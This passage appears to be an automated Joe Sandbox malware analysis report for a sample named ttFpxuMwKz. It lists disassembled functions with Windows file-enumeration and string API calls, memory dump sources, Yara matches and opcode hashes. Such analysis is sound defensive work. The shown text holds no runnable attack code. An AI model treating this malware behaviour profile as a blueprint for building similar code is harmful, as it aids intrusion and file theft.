                                    • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                    • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileNextlstrcat
                                    • String ID: !=A
                                    • API String ID: 3840410801-2919091325
                                    • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                    • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                    • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                    • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                    Function 007F51A7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F51E1
                                    • lstrcat.KERNEL32(?,00421070), ref: 007F51FE
                                    • lstrcat.KERNEL32(?,0064A5F8), ref: 007F5212
                                    • lstrcat.KERNEL32(?,00421074), ref: 007F5224
                                      • Part of subcall function 007F4B77: wsprintfA.USER32 ref: 007F4B93
                                      • Part of subcall function 007F4B77: FindFirstFileA.KERNEL32(?,?), ref: 007F4BAA
                                      • Part of subcall function 007F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 007F4BD8
                                      • Part of subcall function 007F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 007F4BEE
                                      • Part of subcall function 007F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DE4
                                      • Part of subcall function 007F4B77: FindClose.KERNEL32(000000FF), ref: 007F4DF9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                    • Instruction ID: 64aa4697e10afb24fcfd1fa5d86197a571fcd4a2a6ed2edb255b42ba38d78ccd
                                    • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                    • Instruction Fuzzy Hash: 6021ADBAA40208FBC754FBF0DC4AEE9337DAB59700F404589774992181DE7896C9CB92
                                    Function 007F94C7 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID:
                                    • API String ID: 1206339513-0
                                    • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                    • Instruction ID: 2867e8f312e7a1624d4bf531e616526c012166b6d2161a93fdc79b2d827c3187
                                    • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                    • Instruction Fuzzy Hash: 23011A79540108FFCB04DFECD988EAE7BBAEF49394F108148FA098B300C635AA40DB95